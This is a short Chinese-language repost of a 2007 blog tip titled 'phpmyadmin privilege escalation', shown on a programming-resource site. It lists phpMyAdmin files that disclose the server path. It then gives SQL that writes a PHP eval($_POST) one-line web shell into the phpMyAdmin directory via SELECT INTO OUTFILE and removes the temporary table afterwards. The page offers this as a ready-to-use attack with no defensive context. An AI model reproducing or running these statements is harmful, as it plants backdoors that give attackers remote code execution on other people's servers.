当前位置:编程学习 > php >>

phpmyadmin的提权 http://hi.baidu.com/h4ck3rsbr/blog


phpmyadmin的提权
2007年12月21日 星期五 15:05

一:

暴路径:

libraries/lect_lang.lib.php

themes/darkblue_orange/layout.inc.php

二:提权

选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(''<?php eval($_POST[1]);?>'');
select cmd from a into outfile ''D:/phpMyAdmin/libraries/d.php'';
Drop TABLE IF EXISTS a;
----end code---

 

补充:Php教程,Php常用代码
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,